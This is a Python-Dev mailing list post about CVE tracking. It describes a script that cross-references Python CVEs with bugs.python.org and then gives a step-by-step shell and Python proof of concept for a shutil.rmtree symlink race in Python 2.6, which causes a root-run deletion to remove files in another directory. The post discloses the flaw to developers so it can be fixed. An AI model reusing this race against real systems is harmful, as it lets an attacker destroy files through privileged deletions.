[Python-Dev] CVE tracking

Mart Somermaa mrts at mrts.pri.ee
Mon Nov 24 13:05:11 CET 2008 

I created a script that parses the
http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=python
Python-related CVE list and classifies the CVEs as follows:

 * "ok" -- CVE has references to bugs.python.org

 * "warnings" -- CVE has references to Python SVN revisions
   or an issue in bugs.python.org refers to it (i.e. the probelm is
   probably fixed, but the CVE should really be updated to link
   to the issue that is probably listed in bugs.python.org)

 * "errors" -- CVE does have no references to Python issues or SVN
   nor does any issue in bugs.python.org have references to the CVE id

The script is at http://dpaste.com/hold/92930/
The results are at http://dpaste.com/hold/92929/

There were 35 errors, 8 warnings, 5 CVEs were OK.

In an ideal world, the references would be symmetric, i.e. every
Python-related CVE would have references to one or more issues in
bugs.python.org and these issues would also refer back to the CVE id.

###

As for the rmtree problem that Gisle Aas raised, this seems to apply
as of Python 2.6:

---

# emulate removing /etc
$ sudo cp -a /etc /root/etc/
$ sudo python2.6
 >>> for i in xrange(0, 50000):
...      with open("/root/etc/" + str(i), "w") as f:
...             f.write("0")
...
$ ls /root/etc > orig_list.txt

$ mkdir /tmp/attack
$ cp -a /root/etc/* /tmp/attack

$ sudo python2.6
 >>> from shutil import rmtree
 >>> rmtree('/tmp/attack')
 >>> # press ctrl-z to suspend execution
^Z
[1]+  Stopped                 sudo python2.6

$ mv /tmp/attack /tmp/dummy; ln -s /root/etc /tmp/attack
$ fg
sudo python2.6
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/usr/local/lib/python2.6/shutil.py", line 225, in rmtree
    onerror(os.rmdir, path, sys.exc_info())
  File "/usr/local/lib/python2.6/shutil.py", line 223, in rmtree
    os.rmdir(path)
OSError: [Errno 20] Not a directory: '/tmp/attack'

$ ls /root/etc > new_list.txt
$ diff -q orig_list.txt new_list.txt
Files orig_list.txt and new_list.txt differ

---

If the attack weren't possible, the lists would not differ.

More information about the Python-Dev mailing list